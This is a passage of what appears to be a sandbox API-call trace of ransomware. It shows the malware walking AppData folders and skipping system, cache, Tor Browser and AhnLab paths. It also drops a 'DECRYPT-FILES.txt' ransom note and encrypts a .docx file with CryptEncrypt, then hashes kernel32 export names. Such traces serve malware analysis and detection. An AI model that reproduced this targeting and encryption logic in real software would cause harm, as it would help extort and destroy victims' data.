lpString2="lnk") returned 1 [0077.153] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.153] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.153] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0077.153] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.153] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" [0077.153] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\jkbimi8.tmp" [0077.153] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.154] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.154] CloseHandle (hObject=0x0) returned 0 [0077.154] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.154] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0077.154] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0077.154] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0077.154] lstrcatW (in: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\" | out: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0077.154] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Program Files") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch=":\\Windows") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Games\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\All Users") returned 0x0 [0077.154] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.155] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.155] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.155] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="AhnLab") returned 0x0 [0077.155] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0077.155] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.155] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\jkbimi8.tmp") returned 108 [0077.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0077.155] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.155] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt") returned 114 [0077.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.155] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.156] CloseHandle (hObject=0x44c) returned 1 [0077.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0077.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0077.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.157] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.157] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.157] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.157] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.157] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa327c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.157] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.157] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa327c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.157] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.157] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.157] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.157] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.157] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.157] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0077.157] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.157] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0077.157] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp" [0077.157] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.158] CloseHandle (hObject=0x0) returned 0 [0077.158] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.158] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa327c80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.158] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.158] CloseHandle (hObject=0x448) returned 1 [0077.158] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", cAlternateFileName="{31810~1")) returned 0 [0077.158] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0077.159] CloseHandle (hObject=0x440) returned 1 [0077.159] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe1f0a20, ftCreationTime.dwHighDateTime=0x1d4ca1b, ftLastAccessTime.dwLowDateTime=0x1f37e4b0, ftLastAccessTime.dwHighDateTime=0x1d4c807, ftLastWriteTime.dwLowDateTime=0x1f37e4b0, ftLastWriteTime.dwHighDateTime=0x1d4c807, nFileSizeHigh=0x0, nFileSizeLow=0x7126, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISBknX_Ny.docx", cAlternateFileName="ISBKNX~1.DOC")) returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="autorun.inf") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="boot.ini") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="desktop.ini") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="ntuser.dat") returned -1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="iconcache.db") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="bootsect.bak") returned 1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="ntuser.dat.log") returned -1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="thumbs.db") returned -1 [0077.159] lstrcmpiW (lpString1="ISBknX_Ny.docx", lpString2="Bootfont.bin") returned 1 [0077.159] lstrlenW (lpString="ISBknX_Ny.docx") returned 14 [0077.159] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0077.159] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0077.159] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0077.159] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0077.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.159] lstrlenW (lpString="ISBknX_Ny.docx") returned 14 [0077.159] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ISBknX_Ny.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx" [0077.159] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isbknx_ny.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.160] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=28966) returned 1 [0077.160] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.160] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.160] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.160] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.160] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.160] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.160] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.161] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.161] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.162] CloseHandle (hObject=0x444) returned 1 [0077.162] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.162] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.163] CloseHandle (hObject=0x0) returned 0 [0077.163] CloseHandle (hObject=0x440) returned 1 [0077.163] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.164] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.164] GetTickCount () returned 0x114bcca [0077.164] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.164] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.164] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.164] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.165] lstrlenA (lpString="kernel32.dll") returned 12 [0077.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.165] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.165] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.165] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.165] lstrlenA (lpString="ADDATOMA") returned 8 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.165] lstrlenA (lpString="ADDATOMW") returned 8 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.165] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.165] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.165] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.165] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.165] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.165] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.165] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.165] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.165] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.166] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.166] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.166] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.166] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.166] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.166] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.166] lstrcpyA (in: lpString1=0x3f2d1ec, 